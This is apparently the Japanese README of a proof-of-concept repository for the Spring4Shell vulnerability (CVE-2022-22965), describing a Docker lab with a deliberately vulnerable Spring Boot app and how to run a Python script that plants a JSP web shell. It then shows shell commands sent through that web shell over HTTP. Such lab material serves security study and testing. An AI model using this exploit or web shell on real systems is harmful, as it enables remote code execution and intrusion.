
CVE-2022-22965 (Spring4Shell) の概念実証エクスプロイト。脆弱な Spring Boot アプリケーション、Python エクスプロイトスクリプト、およびテスト用の Docker ベースのラボ環境が含まれています。
これは、CVE-2022-22965 (spring4shell) 脆弱性のエクスプロイトの概念実証です。 以下で構成されています:
プロジェクトのルートフォルダ内に、Tomcatイメージを作成し、vulnerable_app/target/spring4shell.war と safe_app/target/safeapp.war ファイルを /usr/local/tomcat/webapps フォルダにコピーするDockerfileがあります。そのため、イメージをビルドしてコンテナを起動するだけです。
docker build -t cve_2022_22965 .
docker run -p 8080:8080 -d --name springshell cve_2022_22965
curl --location --request POST http://localhost:8080/spring4shell/vulnerability/exploit?name=Elliot%20Alderson
次のような応答が見られた場合
This is Elliot Alderson
アプリケーションは正常に動作しています。
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit
挿入するJSPファイル名をオプションで指定できますが、必須ではありません。 例
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit -f exploit.jsp
名前を指定しない場合、ランダムな名前が生成されます。
コマンドシェルに次のように表示されます

エクスプロイト後、HTTP GETリクエストでもコマンドを送信できます
http://localhost:8080/exploit.jsp?pwd=pass&cmd=ls
被害マシンでシェルを開くことに成功しました!お楽しみください。